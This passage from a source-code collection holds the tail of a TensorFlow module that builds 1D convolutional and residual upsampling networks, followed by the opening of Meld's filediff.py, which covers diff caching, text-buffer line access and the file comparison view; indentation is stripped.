histogram_variable_summaries(l)
return l
def build_upsampling_block(input_tensor, residual_tensor,
filter_size,
layer_number,
act=tf.nn.relu,
is_training=True,
depth=None,
padding='VALID',
tensorboard_output=False,
name=None):
# assume this layer is half the depth of the previous layer if no depth
# information is given
if depth is None:
depth = int(input_tensor.get_shape().as_list()[-1]/2)
with tf.name_scope('{}_layer_weights'.format(layer_number)):
W = weight_variable([filter_size,
input_tensor.get_shape().as_list()[-1],
depth])
if tensorboard_output:
histogram_variable_summaries(W)
with tf.name_scope('{}_layer_biases'.format(layer_number)):
b = bias_variable([depth])
if tensorboard_output:
histogram_variable_summaries(b)
with tf.name_scope('{}_layer_conv_preactivation'.format(layer_number)):
l = tf.nn.conv1d(input_tensor, W, stride=1,
padding=padding, name=name) + b
if tensorboard_output:
histogram_variable_summaries(l)
with tf.name_scope('{}_layer_batch_norm'.format(layer_number)) as scope:
# l = tf.nn.dropout(l, keep_prob=0.25)
l = batch_norm(l, is_training, scope)
# l = tf.nn.l2_normalize(l, dim=2)
with tf.name_scope('{}_layer_conv_activation'.format(layer_number)):
l = act(l, name=name)
if tensorboard_output:
histogram_variable_summaries(l)
with tf.name_scope('{}_layer_subpixel_reshuffle'.format(layer_number)):
l = subpixel_reshuffle_1D(l,
residual_tensor.get_shape().as_list()[-1],
name=name)
if tensorboard_output:
histogram_variable_summaries(l)
with tf.name_scope('{}_layer_stacking'.format(layer_number)):
sliced = tf.slice(residual_tensor,
begin=[0, 0, 0],
size=[-1, l.get_shape().as_list()[1], -1])
l = tf.concat((l, sliced), axis=2, name=name)
if tensorboard_output:
histogram_variable_summaries(l)
return l
# ######################
# ######################
# #################
# MODEL DEFINITIONS
# #################
def single_fully_connected_model(input_type, input_shape,
n_inputs, n_weights,
tensorboard_output=True,
scope_name='single_fully_connected_layer'):
with tf.name_scope(scope_name):
# input of the model (examples)
s = [None]
shape_prod = 1
for i in input_shape:
s.append(i)
shape_prod *= i
x = tf.placeholder(input_type, shape=s)
x_ = tf.reshape(x, [-1, shape_prod])
# first conv layer
with tf.name_scope('first_layer_weights'):
s = []
s.append(shape_prod)
s.append(n_weights)
W = weight_variable(s)
if tensorboard_output:
histogram_variable_summaries(W)
with tf.name_scope('first_layer_biases'):
b = bias_variable([n_weights])
if tensorboard_output:
histogram_variable_summaries(b)
with tf.name_scope('first_layer_preactivation'):
preact = tf.matmul(x_, W) + b
if tensorboard_output:
histogram_variable_summaries(preact)
with tf.name_scope('first_layer_activation'):
y = tf.identity(preact, name=scope_name)
if tensorboard_output:
histogram_variable_summaries(y)
return x, y
def three_layer_conv_model(input_type, input_shape,
first_conv_window=30, first_conv_depth=128,
second_conv_window=10, second_conv_depth=64,
third_conv_window=15,
tensorboard_output=False,
scope_name='3-layer_conv'):
with tf.name_scope(scope_name):
# input of the model (examples)
s = [None]
for i in input_shape:
s.append(i)
x = tf.placeholder(input_type, shape=s)
# first conv layer
h1 = build_1d_conv_layer(x, 1,
first_conv_window, first_conv_depth,
tf.nn.elu, 1,
tensorboard_output)
# second conv layer
h2 = build_1d_conv_layer(h1, first_conv_depth,
second_conv_window, second_conv_depth,
tf.nn.elu, 2,
tensorboard_output)
# third (last) conv layer
y = build_1d_conv_layer(h2, second_conv_depth,
third_conv_window, 1,
tf.identity, 3,
tensorboard_output,
scope_name)
return x, y
def five_layer_conv_model(input_type, input_shape,
first_conv_window=30, first_conv_depth=256,
second_conv_window=20, second_conv_depth=128,
third_conv_window=10, third_conv_depth=64,
fourth_conv_window=5, fourth_conv_depth=32,
fifth_conv_window=5,
tensorboard_output=False,
scope_name='5-layer_conv'):
with tf.name_scope(scope_name):
# input of the model (examples)
s = [None]
for i in input_shape:
s.append(i)
x = tf.placeholder(input_type, shape=s)
# first conv layer
h1 = build_1d_conv_layer(x, 1,
first_conv_window, first_conv_depth,
tf.nn.elu, 1,
tensorboard_output)
# second conv layer
h2 = build_1d_conv_layer(h1, first_conv_depth,
second_conv_window, second_conv_depth,
tf.nn.elu, 2,
tensorboard_output)
# third conv layer
h3 = build_1d_conv_layer(h2, second_conv_depth,
third_conv_window, third_conv_depth,
tf.nn.elu, 3,
tensorboard_output)
# fourth conv layer
h4 = build_1d_conv_layer(h3, third_conv_depth,
fourth_conv_window, fourth_conv_depth,
tf.nn.elu, 4,
tensorboard_output)
# fifth (last) conv layer
y = build_1d_conv_layer(h4, fourth_conv_depth,
fifth_conv_window, 1,
tf.identity, 5,
tensorboard_output,
scope_name)
return x, y
def deep_residual_network(input_type, input_shape,
number_of_downsample_layers=8,
channel_multiple=8,
initial_filter_window=5,
initial_stride=2,
downsample_filter_window=3,
downsample_stride=2,
bottleneck_filter_window=4,
bottleneck_stride=2,
upsample_filter_window=3,
tensorboard_output=False,
scope_name='deep_residual'):
print('layer summary for {} network'.format(scope_name))
downsample_layers = []
upsample_layers = []
with tf.name_scope(scope_name):
# training flag
train_flag = tf.placeholder(tf.bool)
# input of the model (examples)
s = [None]
for i in input_shape:
s.append(i)
x = tf.placeholder(input_type, shape=s)
input_size = s[-2]
num_of_channels = s[-1]
print('input: {}'.format(x.get_shape().as_list()[1:]))
d1 = build_downsampling_block(x,
filter_size=initial_filter_window,
stride=initial_stride,
tensorboard_output=tensorboard_output,
depth=channel_multiple*num_of_channels,
is_training=train_flag,
layer_number=1)
print('downsample layer: {}'.format(d1.get_shape().as_list()[1:]))
downsample_layers.append(d1)
layer_count = 2
for i in range(number_of_downsample_layers - 1):
d = build_downsampling_block(
downsample_layers[-1],
filter_size=downsample_filter_window,
stride=downsample_stride,
tensorboard_output=tensorboard_output,
is_training=train_flag,
layer_number=layer_count)
print('downsample layer: {}'.format(d.get_shape().as_list()[1:]))
downsample_layers.append(d)
layer_count += 1
bn = build_downsampling_block(downsample_layers[-1],
filter_size=bottleneck_filter_window,
stride=bottleneck_stride,
tensorboard_output=tensorboard_output,
is_training=train_flag,
layer_number=layer_count)
print('bottleneck layer: {}'.format(bn.get_shape().as_list()[1:]))
layer_count += 1
u1 = build_upsampling_block(bn, downsample_layers[-1],
depth=bn.get_shape().as_list()[-1],
filter_size=upsample_filter_window,
tensorboard_output=tensorboard_output,
is_training=train_flag,
layer_number=layer_count)
print('upsample layer: {}'.format(u1.get_shape().as_list()[1:]))
upsample_layers.append(u1)
layer_count += 1
for i in range(number_of_downsample_layers - 2, -1, -1):
u = build_upsampling_block(upsample_layers[-1],
downsample_layers[i],
filter_size=upsample_filter_window,
tensorboard_output=tensorboard_output,
is_training=train_flag,
layer_number=layer_count)
print('upsample layer: {}'.format(u.get_shape().as_list()[1:]))
upsample_layers.append(u)
layer_count += 1
target_size = int(input_size/initial_stride)
restack = subpixel_restack(upsample_layers[-1],
target_size + (upsample_filter_window - 1))
print('restack layer: {}'.format(restack.get_shape().as_list()[1:]))
conv = build_1d_conv_layer(restack, restack.get_shape().as_list()[-1],
upsample_filter_window, initial_stride,
tf.nn.elu, layer_count,
padding='VALID',
tensorboard_output=tensorboard_output)
print('final conv layer: {}'.format(conv.get_shape().as_list()[1:]))
# NOTE this effectively is a linear activation on the last conv layer
y = subpixel_reshuffle_1D(conv,
num_of_channels)
y = tf.add(y, x, name=scope_name)
print('output: {}'.format(y.get_shape().as_list()[1:]))
return train_flag, x, y
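# Typical construction of the upsampling model (a sketch only; input_shape is
# whatever (samples, channels) pair the training pipeline provides and is not
# taken from the original training script):
#
#   train_flag, x, y = deep_residual_network(tf.float32, input_shape)
#   # feed_dict sketch during training: {x: batch, train_flag: True}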
# #################
# #################
| mit | 1,638,412,468,420,272,000 | 39.112205 | 79 | 0.49178 | false | 4.135782 | false | false | false |
nekohayo/meld | meld/filediff.py | 1 | 77547 | ### Copyright (C) 2002-2006 Stephen Kennedy <[email protected]>
### Copyright (C) 2009-2010 Kai Willadsen <[email protected]>
### This program is free software; you can redistribute it and/or modify
### it under the terms of the GNU General Public License as published by
### the Free Software Foundation; either version 2 of the License, or
### (at your option) any later version.
### This program is distributed in the hope that it will be useful,
### but WITHOUT ANY WARRANTY; without even the implied warranty of
### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
### GNU General Public License for more details.
### You should have received a copy of the GNU General Public License
### along with this program; if not, write to the Free Software
### Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import codecs
import copy
import os
from gettext import gettext as _
import sys
import time
import pango
import glib
import gobject
import gtk
import gtk.keysyms
import diffutil
from ui import findbar
from ui import gnomeglade
import matchers
import misc
import melddoc
import patchdialog
import paths
import merge
from meldapp import app
from util.sourceviewer import srcviewer
class CachedSequenceMatcher(object):
"""Simple class for caching diff results, with LRU-based eviction
Results from the SequenceMatcher are cached and timestamped, and
subsequently evicted based on least-recent generation/usage. The LRU-based
eviction is overly simplistic, but is okay for our usage pattern.
"""
def __init__(self):
self.cache = {}
def __call__(self, text1, textn):
try:
self.cache[(text1, textn)][1] = time.time()
return self.cache[(text1, textn)][0]
except KeyError:
matcher = matchers.MyersSequenceMatcher(None, text1, textn)
opcodes = matcher.get_opcodes()
self.cache[(text1, textn)] = [opcodes, time.time()]
return opcodes
def clean(self, size_hint):
"""Clean the cache if necessary
@param size_hint: the recommended minimum number of cache entries
"""
if len(self.cache) < size_hint * 3:
return
items = self.cache.items()
items.sort(key=lambda it: it[1][1])
for item in items[:-size_hint * 2]:
del self.cache[item[0]]
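# Illustrative use of CachedSequenceMatcher (the line tuples are made up):
#
#   matcher = CachedSequenceMatcher()
#   opcodes = matcher(('a', 'b', 'c'), ('a', 'c'))   # computed and cached
#   opcodes = matcher(('a', 'b', 'c'), ('a', 'c'))   # served from the cache
#   matcher.clean(10)  # evicts least-recently-used entries, but only once
#                      # the cache has grown past 3 * size_hint entries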
class BufferLines(object):
"""gtk.TextBuffer shim with line-based access and optional filtering
This class allows a gtk.TextBuffer to be treated as a list of lines of
possibly-filtered text. If no filter is given, the raw output from the
gtk.TextBuffer is used.
The logic here (and in places in FileDiff) requires that Python's
unicode splitlines() implementation and gtk.TextBuffer agree on where
linebreaks occur. Happily, this is usually the case.
"""
def __init__(self, buf, textfilter=None):
self.buf = buf
if textfilter is not None:
self.textfilter = textfilter
else:
self.textfilter = lambda x: x
def __getslice__(self, lo, hi):
# FIXME: If we ask for arbitrary slices past the end of the buffer,
# this will return the last line.
start = get_iter_at_line_or_eof(self.buf, lo)
end = get_iter_at_line_or_eof(self.buf, hi)
txt = unicode(self.buf.get_text(start, end, False), 'utf8')
filter_txt = self.textfilter(txt)
lines = filter_txt.splitlines()
ends = filter_txt.splitlines(True)
# The last line in a gtk.TextBuffer is guaranteed never to end in a
# newline. As splitlines() discards an empty line at the end, we need
# to artificially add a line if the requested slice is past the end of
# the buffer, and the last line in the slice ended in a newline.
if hi >= self.buf.get_line_count() and \
(len(lines) == 0 or len(lines[-1]) != len(ends[-1])):
lines.append(u"")
ends.append(u"")
hi = self.buf.get_line_count() if hi == sys.maxint else hi
if hi - lo != len(lines):
# These codepoints are considered line breaks by Python, but not
# by GtkTextStore.
additional_breaks = set((u'\x0c', u'\x85'))
i = 0
while i < len(ends):
line, end = lines[i], ends[i]
# It's possible that the last line in a file would end in a
# line break character, which requires no joining.
if end and end[-1] in additional_breaks and \
(not line or line[-1] not in additional_breaks):
assert len(ends) >= i + 1
lines[i:i + 2] = [line + end[-1] + lines[i + 1]]
ends[i:i + 2] = [end + ends[i + 1]]
i += 1
return lines
def __getitem__(self, i):
if i > len(self):
raise IndexError
line_start = get_iter_at_line_or_eof(self.buf, i)
line_end = line_start.copy()
if not line_end.ends_line():
line_end.forward_to_line_end()
txt = self.buf.get_text(line_start, line_end, False)
return unicode(self.textfilter(txt), 'utf8')
def __len__(self):
return self.buf.get_line_count()
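# Sketch of how BufferLines is used (the buffer contents and the filter below
# are hypothetical):
#
#   lines = BufferLines(textbuffer, lambda txt: txt.lower())
#   lines[0]        # first line of the buffer, with the filter applied
#   lines[2:5]      # filtered lines 2-4, honouring buffer line breaks
#   len(lines)      # same as textbuffer.get_line_count()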
################################################################################
#
# FileDiff
#
################################################################################
MASK_SHIFT, MASK_CTRL = 1, 2
MODE_REPLACE, MODE_DELETE, MODE_INSERT = 0, 1, 2
def get_iter_at_line_or_eof(buf, line):
if line >= buf.get_line_count():
return buf.get_end_iter()
return buf.get_iter_at_line(line)
def buffer_insert(buf, line, text):
if line >= buf.get_line_count():
# TODO: We need to insert a linebreak here, but there is no
# way to be certain what kind of linebreak to use.
text = "\n" + text
it = get_iter_at_line_or_eof(buf, line)
buf.insert(it, text)
return it
class CursorDetails(object):
__slots__ = ("pane", "pos", "line", "offset", "chunk", "prev", "next",
"prev_conflict", "next_conflict")
def __init__(self):
for var in self.__slots__:
setattr(self, var, None)
class TaskEntry(object):
__slots__ = ("filename", "file", "buf", "codec", "pane", "was_cr")
def __init__(self, *args):
for var, val in zip(self.__slots__, args):
setattr(self, var, val)
class TextviewLineAnimation(object):
__slots__ = ("start_mark", "end_mark", "start_rgba", "end_rgba",
"start_time", "duration")
def __init__(self, mark0, mark1, rgba0, rgba1, duration):
self.start_mark = mark0
self.end_mark = mark1
self.start_rgba = rgba0
self.end_rgba = rgba1
self.start_time = glib.get_current_time()
self.duration = duration
class FileDiff(melddoc.MeldDoc, gnomeglade.Component):
"""Two or three way diff of text files.
"""
differ = diffutil.Differ
keylookup = {gtk.keysyms.Shift_L : MASK_SHIFT,
gtk.keysyms.Control_L : MASK_CTRL,
gtk.keysyms.Shift_R : MASK_SHIFT,
gtk.keysyms.Control_R : MASK_CTRL}
# Identifiers for MsgArea messages
(MSG_SAME,) = range(1)
__gsignals__ = {
'next-conflict-changed': (gobject.SIGNAL_RUN_FIRST, gobject.TYPE_NONE, (bool, bool)),
'action-mode-changed': (gobject.SIGNAL_RUN_FIRST, gobject.TYPE_NONE, (int,)),
}
    def __init__(self, prefs, num_panes):
        """Start up a filediff with num_panes empty contents.
        """
melddoc.MeldDoc.__init__(self, prefs)
gnomeglade.Component.__init__(self, paths.ui_dir("filediff.ui"), "filediff")
self.map_widgets_into_lists(["textview", "fileentry", "diffmap", "scrolledwindow", "linkmap", "statusimage", "msgarea_mgr", "vbox"])
self.warned_bad_comparison = False
# Some sourceviews bind their own undo mechanism, which we replace
gtk.binding_entry_remove(srcviewer.GtkTextView, gtk.keysyms.z,
gtk.gdk.CONTROL_MASK)
gtk.binding_entry_remove(srcviewer.GtkTextView, gtk.keysyms.z,
gtk.gdk.CONTROL_MASK | gtk.gdk.SHIFT_MASK)
for v in self.textview:
v.set_buffer(srcviewer.GtkTextBuffer())
v.set_show_line_numbers(self.prefs.show_line_numbers)
v.set_insert_spaces_instead_of_tabs(self.prefs.spaces_instead_of_tabs)
v.set_wrap_mode(self.prefs.edit_wrap_lines)
if self.prefs.show_whitespace:
v.set_draw_spaces(srcviewer.spaces_flag)
srcviewer.set_tab_width(v, self.prefs.tab_size)
self._keymask = 0
self.load_font()
self.deleted_lines_pending = -1
self.textview_overwrite = 0
self.textview_focussed = None
self.textview_overwrite_handlers = [ t.connect("toggle-overwrite", self.on_textview_toggle_overwrite) for t in self.textview ]
self.textbuffer = [v.get_buffer() for v in self.textview]
self.bufferdata = [MeldBufferData() for b in self.textbuffer]
self.buffer_texts = [BufferLines(b) for b in self.textbuffer]
self.text_filters = []
self.create_text_filters()
app.connect("text-filters-changed", self.on_text_filters_changed)
self.buffer_filtered = [BufferLines(b, self._filter_text) for
b in self.textbuffer]
for (i, w) in enumerate(self.scrolledwindow):
w.get_vadjustment().connect("value-changed", self._sync_vscroll, i)
w.get_hadjustment().connect("value-changed", self._sync_hscroll)
self._connect_buffer_handlers()
self._sync_vscroll_lock = False
self._sync_hscroll_lock = False
self._scroll_lock = False
self.linediffer = self.differ()
self.linediffer.ignore_blanks = self.prefs.ignore_blank_lines
self.in_nested_textview_gutter_expose = False
self._inline_cache = set()
self._cached_match = CachedSequenceMatcher()
self.anim_source_id = []
self.animating_chunks = []
for buf in self.textbuffer:
buf.create_tag("inline", background=self.prefs.color_inline_bg,
foreground=self.prefs.color_inline_fg)
self.anim_source_id.append(None)
self.animating_chunks.append([])
def parse_to_cairo(color_spec):
c = gtk.gdk.color_parse(color_spec)
return tuple([x / 65535. for x in (c.red, c.green, c.blue)])
self.fill_colors = {"insert" : parse_to_cairo(self.prefs.color_delete_bg),
"delete" : parse_to_cairo(self.prefs.color_delete_bg),
"conflict" : parse_to_cairo(self.prefs.color_conflict_bg),
"replace" : parse_to_cairo(self.prefs.color_replace_bg)}
darken = lambda color: tuple([x * 0.8 for x in color])
self.line_colors = {"insert" : darken(self.fill_colors["insert"]),
"delete" : darken(self.fill_colors["delete"]),
"conflict" : darken(self.fill_colors["conflict"]),
"replace" : darken(self.fill_colors["replace"])}
actions = (
("MakePatch", None, _("Format as patch..."), None, _("Create a patch using differences between files"), self.make_patch),
("PrevConflict", None, _("Previous conflict"), "<Ctrl>I", _("Go to the previous conflict"), lambda x: self.on_next_conflict(gtk.gdk.SCROLL_UP)),
("NextConflict", None, _("Next conflict"), "<Ctrl>K", _("Go to the next conflict"), lambda x: self.on_next_conflict(gtk.gdk.SCROLL_DOWN)),
("PushLeft", gtk.STOCK_GO_BACK, _("Push to left"), "<Alt>Left", _("Push current change to the left"), lambda x: self.push_change(-1)),
("PushRight", gtk.STOCK_GO_FORWARD, _("Push to right"), "<Alt>Right", _("Push current change to the right"), lambda x: self.push_change(1)),
# FIXME: using LAST and FIRST is terrible and unreliable icon abuse
("PullLeft", gtk.STOCK_GOTO_LAST, _("Pull from left"), "<Alt><Shift>Right", _("Pull change from the left"), lambda x: self.pull_change(-1)),
("PullRight", gtk.STOCK_GOTO_FIRST, _("Pull from right"), "<Alt><Shift>Left", _("Pull change from the right"), lambda x: self.pull_change(1)),
("CopyLeftUp", None, _("Copy above left"), "<Alt>bracketleft", _("Copy change above the left chunk"), lambda x: self.copy_change(-1, -1)),
("CopyLeftDown", None, _("Copy below left"), "<Alt>semicolon", _("Copy change below the left chunk"), lambda x: self.copy_change(-1, 1)),
("CopyRightUp", None, _("Copy above right"), "<Alt>bracketright", _("Copy change above the right chunk"), lambda x: self.copy_change(1, -1)),
("CopyRightDown", None, _("Copy below right"), "<Alt>quoteright", _("Copy change below the right chunk"), lambda x: self.copy_change(1, 1)),
("Delete", gtk.STOCK_DELETE, _("Delete"), "<Alt>Delete", _("Delete change"), self.delete_change),
("MergeFromLeft", None, _("Merge all changes from left"), None, _("Merge all non-conflicting changes from the left"), lambda x: self.pull_all_non_conflicting_changes(-1)),
("MergeFromRight", None, _("Merge all changes from right"), None, _("Merge all non-conflicting changes from the right"), lambda x: self.pull_all_non_conflicting_changes(1)),
("MergeAll", None, _("Merge all non-conflicting"), None, _("Merge all non-conflicting changes from left and right panes"), lambda x: self.merge_all_non_conflicting_changes()),
("CycleDocuments", None, _("Cycle through documents"), "<control>Escape", _("Move keyboard focus to the next document in this comparison"), self.action_cycle_documents),
)
toggle_actions = (
("LockScrolling", None, _("Lock scrolling"), None,
_("Lock scrolling of all panes"),
self.on_action_lock_scrolling_toggled, True),
)
self.ui_file = paths.ui_dir("filediff-ui.xml")
self.actiongroup = gtk.ActionGroup('FilediffPopupActions')
self.actiongroup.set_translation_domain("meld")
self.actiongroup.add_actions(actions)
self.actiongroup.add_toggle_actions(toggle_actions)
self.set_num_panes(num_panes)
gobject.idle_add( lambda *args: self.load_font()) # hack around Bug 316730
gnomeglade.connect_signal_handlers(self)
self.findbar = findbar.FindBar()
self.filediff.pack_end(self.findbar.widget, False)
self.cursor = CursorDetails()
self.connect("current-diff-changed", self.on_current_diff_changed)
for t in self.textview:
t.connect("focus-in-event", self.on_current_diff_changed)
t.connect("focus-out-event", self.on_current_diff_changed)
self.linediffer.connect("diffs-changed", self.on_diffs_changed)
self.undosequence.connect("checkpointed", self.on_undo_checkpointed)
self.connect("next-conflict-changed", self.on_next_conflict_changed)
def get_keymask(self):
return self._keymask
def set_keymask(self, value):
if value & MASK_SHIFT:
mode = MODE_DELETE
elif value & MASK_CTRL:
mode = MODE_INSERT
else:
mode = MODE_REPLACE
self._keymask = value
self.emit("action-mode-changed", mode)
keymask = property(get_keymask, set_keymask)
def on_focus_change(self):
self.keymask = 0
def on_container_switch_in_event(self, ui):
melddoc.MeldDoc.on_container_switch_in_event(self, ui)
# FIXME: If no focussed textview, action sensitivity will be unset
if self.textview_focussed:
self.scheduler.add_task(self.textview_focussed.grab_focus)
def on_text_filters_changed(self, app):
relevant_change = self.create_text_filters()
if relevant_change:
self.refresh_comparison()
def create_text_filters(self):
# In contrast to file filters, ordering of text filters can matter
old_active = [f.filter_string for f in self.text_filters if f.active]
new_active = [f.filter_string for f in app.text_filters if f.active]
active_filters_changed = old_active != new_active
self.text_filters = [copy.copy(f) for f in app.text_filters]
return active_filters_changed
def _disconnect_buffer_handlers(self):
for textview in self.textview:
textview.set_editable(0)
for buf in self.textbuffer:
assert hasattr(buf,"handlers")
for h in buf.handlers:
buf.disconnect(h)
def _connect_buffer_handlers(self):
for textview in self.textview:
textview.set_editable(1)
for buf in self.textbuffer:
id0 = buf.connect("insert-text", self.on_text_insert_text)
id1 = buf.connect("delete-range", self.on_text_delete_range)
id2 = buf.connect_after("insert-text", self.after_text_insert_text)
id3 = buf.connect_after("delete-range", self.after_text_delete_range)
id4 = buf.connect("notify::cursor-position",
self.on_cursor_position_changed)
buf.handlers = id0, id1, id2, id3, id4
# Abbreviations for insert and overwrite that fit in the status bar
_insert_overwrite_text = (_("INS"), _("OVR"))
# Abbreviation for line, column so that it will fit in the status bar
_line_column_text = _("Ln %i, Col %i")
def on_cursor_position_changed(self, buf, pspec, force=False):
pane = self.textbuffer.index(buf)
pos = buf.props.cursor_position
if pane == self.cursor.pane and pos == self.cursor.pos and not force:
return
self.cursor.pane, self.cursor.pos = pane, pos
cursor_it = buf.get_iter_at_offset(pos)
offset = cursor_it.get_line_offset()
line = cursor_it.get_line()
insert_overwrite = self._insert_overwrite_text[self.textview_overwrite]
line_column = self._line_column_text % (line + 1, offset + 1)
status = "%s : %s" % (insert_overwrite, line_column)
self.emit("status-changed", status)
if line != self.cursor.line or force:
chunk, prev, next = self.linediffer.locate_chunk(pane, line)
if chunk != self.cursor.chunk or force:
self.cursor.chunk = chunk
self.emit("current-diff-changed")
if prev != self.cursor.prev or next != self.cursor.next or force:
self.emit("next-diff-changed", prev is not None,
next is not None)
prev_conflict, next_conflict = None, None
for conflict in self.linediffer.conflicts:
if prev is not None and conflict <= prev:
prev_conflict = conflict
if next is not None and conflict >= next:
next_conflict = conflict
break
if prev_conflict != self.cursor.prev_conflict or \
next_conflict != self.cursor.next_conflict or force:
self.emit("next-conflict-changed", prev_conflict is not None,
next_conflict is not None)
self.cursor.prev, self.cursor.next = prev, next
self.cursor.prev_conflict = prev_conflict
self.cursor.next_conflict = next_conflict
self.cursor.line, self.cursor.offset = line, offset
def on_current_diff_changed(self, widget, *args):
pane = self.cursor.pane
chunk_id = self.cursor.chunk
push_left, push_right, pull_left, pull_right, delete, \
copy_left, copy_right = (True,) * 7
if pane == -1 or chunk_id is None:
push_left, push_right, pull_left, pull_right, delete, \
copy_left, copy_right = (False,) * 7
else:
# Push and Delete are active if the current pane has something to
# act on, and the target pane exists and is editable. Pull is
# sensitive if the source pane has something to get, and the
# current pane is editable. Copy actions are sensitive if the
# conditions for push are met, *and* there is some content in the
# target pane.
editable = self.textview[pane].get_editable()
editable_left = pane > 0 and self.textview[pane - 1].get_editable()
editable_right = pane < self.num_panes - 1 and \
self.textview[pane + 1].get_editable()
if pane == 0 or pane == 2:
chunk = self.linediffer.get_chunk(chunk_id, pane)
insert_chunk = chunk[1] == chunk[2]
delete_chunk = chunk[3] == chunk[4]
push_left = editable_left and not insert_chunk
push_right = editable_right and not insert_chunk
pull_left = pane == 2 and editable and not delete_chunk
pull_right = pane == 0 and editable and not delete_chunk
delete = editable and not insert_chunk
copy_left = push_left and not delete_chunk
copy_right = push_right and not delete_chunk
elif pane == 1:
chunk0 = self.linediffer.get_chunk(chunk_id, 1, 0)
chunk2 = None
if self.num_panes == 3:
chunk2 = self.linediffer.get_chunk(chunk_id, 1, 2)
left_mid_exists = chunk0 is not None and chunk0[1] != chunk0[2]
left_exists = chunk0 is not None and chunk0[3] != chunk0[4]
right_mid_exists = chunk2 is not None and chunk2[1] != chunk2[2]
right_exists = chunk2 is not None and chunk2[3] != chunk2[4]
push_left = editable_left and left_mid_exists
push_right = editable_right and right_mid_exists
pull_left = editable and left_exists
pull_right = editable and right_exists
delete = editable and (left_mid_exists or right_mid_exists)
copy_left = push_left and left_exists
copy_right = push_right and right_exists
self.actiongroup.get_action("PushLeft").set_sensitive(push_left)
self.actiongroup.get_action("PushRight").set_sensitive(push_right)
self.actiongroup.get_action("PullLeft").set_sensitive(pull_left)
self.actiongroup.get_action("PullRight").set_sensitive(pull_right)
self.actiongroup.get_action("Delete").set_sensitive(delete)
self.actiongroup.get_action("CopyLeftUp").set_sensitive(copy_left)
self.actiongroup.get_action("CopyLeftDown").set_sensitive(copy_left)
self.actiongroup.get_action("CopyRightUp").set_sensitive(copy_right)
self.actiongroup.get_action("CopyRightDown").set_sensitive(copy_right)
# FIXME: don't queue_draw() on everything... just on what changed
self.queue_draw()
def on_next_conflict_changed(self, doc, have_prev, have_next):
self.actiongroup.get_action("PrevConflict").set_sensitive(have_prev)
self.actiongroup.get_action("NextConflict").set_sensitive(have_next)
def on_next_conflict(self, direction):
if direction == gtk.gdk.SCROLL_DOWN:
target = self.cursor.next_conflict
else: # direction == gtk.gdk.SCROLL_UP
target = self.cursor.prev_conflict
if target is None:
return
buf = self.textbuffer[self.cursor.pane]
chunk = self.linediffer.get_chunk(target, self.cursor.pane)
buf.place_cursor(buf.get_iter_at_line(chunk[1]))
self.textview[self.cursor.pane].scroll_to_mark(buf.get_insert(), 0.1)
def push_change(self, direction):
src = self._get_focused_pane()
dst = src + direction
chunk = self.linediffer.get_chunk(self.cursor.chunk, src, dst)
assert(src != -1 and self.cursor.chunk is not None)
assert(dst in (0, 1, 2))
assert(chunk is not None)
self.replace_chunk(src, dst, chunk)
def pull_change(self, direction):
dst = self._get_focused_pane()
src = dst + direction
chunk = self.linediffer.get_chunk(self.cursor.chunk, src, dst)
assert(dst != -1 and self.cursor.chunk is not None)
assert(src in (0, 1, 2))
assert(chunk is not None)
self.replace_chunk(src, dst, chunk)
def copy_change(self, direction, copy_direction):
src = self._get_focused_pane()
dst = src + direction
chunk = self.linediffer.get_chunk(self.cursor.chunk, src, dst)
assert(src != -1 and self.cursor.chunk is not None)
assert(dst in (0, 1, 2))
assert(chunk is not None)
copy_up = True if copy_direction < 0 else False
self.copy_chunk(src, dst, chunk, copy_up)
def pull_all_non_conflicting_changes(self, direction):
assert direction in (-1, 1)
dst = self._get_focused_pane()
src = dst + direction
assert src in range(self.num_panes)
merger = merge.Merger()
merger.differ = self.linediffer
merger.texts = self.buffer_texts
for mergedfile in merger.merge_2_files(src, dst):
pass
self._sync_vscroll_lock = True
self.on_textbuffer__begin_user_action()
self.textbuffer[dst].set_text(mergedfile)
self.on_textbuffer__end_user_action()
def resync():
self._sync_vscroll_lock = False
self._sync_vscroll(self.scrolledwindow[src].get_vadjustment(), src)
self.scheduler.add_task(resync)
def merge_all_non_conflicting_changes(self):
dst = 1
merger = merge.Merger()
merger.differ = self.linediffer
merger.texts = self.buffer_texts
for mergedfile in merger.merge_3_files(False):
pass
self._sync_vscroll_lock = True
self.on_textbuffer__begin_user_action()
self.textbuffer[dst].set_text(mergedfile)
self.on_textbuffer__end_user_action()
def resync():
self._sync_vscroll_lock = False
self._sync_vscroll(self.scrolledwindow[0].get_vadjustment(), 0)
self.scheduler.add_task(resync)
def delete_change(self, widget):
pane = self._get_focused_pane()
chunk = self.linediffer.get_chunk(self.cursor.chunk, pane)
assert(pane != -1 and self.cursor.chunk is not None)
assert(chunk is not None)
self.delete_chunk(pane, chunk)
def _synth_chunk(self, pane0, pane1, line):
"""Returns the Same chunk that would exist at
the given location if we didn't remove Same chunks"""
# This method is a hack around our existing diffutil data structures;
# getting rid of the Same chunk removal is difficult, as several places
# have baked in the assumption of only being given changed blocks.
buf0, buf1 = self.textbuffer[pane0], self.textbuffer[pane1]
start0, end0 = 0, buf0.get_line_count() - 1
start1, end1 = 0, buf1.get_line_count() - 1
# This hack is required when pane0's prev/next chunk doesn't exist
# (i.e., is Same) between pane0 and pane1.
prev_chunk0, prev_chunk1, next_chunk0, next_chunk1 = (None,) * 4
_, prev, next = self.linediffer.locate_chunk(pane0, line)
if prev is not None:
while prev >= 0:
prev_chunk0 = self.linediffer.get_chunk(prev, pane0, pane1)
prev_chunk1 = self.linediffer.get_chunk(prev, pane1, pane0)
if None not in (prev_chunk0, prev_chunk1):
start0 = prev_chunk0[2]
start1 = prev_chunk1[2]
break
prev -= 1
if next is not None:
while next < self.linediffer.diff_count():
next_chunk0 = self.linediffer.get_chunk(next, pane0, pane1)
next_chunk1 = self.linediffer.get_chunk(next, pane1, pane0)
if None not in (next_chunk0, next_chunk1):
end0 = next_chunk0[1]
end1 = next_chunk1[1]
break
next += 1
return "Same", start0, end0, start1, end1
def _corresponding_chunk_line(self, chunk, line, pane, new_pane):
"""Approximates the corresponding line between panes"""
old_buf, new_buf = self.textbuffer[pane], self.textbuffer[new_pane]
# Special-case cross-pane jumps
if (pane == 0 and new_pane == 2) or (pane == 2 and new_pane == 0):
proxy = self._corresponding_chunk_line(chunk, line, pane, 1)
return self._corresponding_chunk_line(chunk, proxy, 1, new_pane)
        # Either we are currently in an identifiable chunk, or we are in a Same
# chunk; if we establish the start/end of that chunk in both panes, we
# can figure out what our new offset should be.
cur_chunk = None
if chunk is not None:
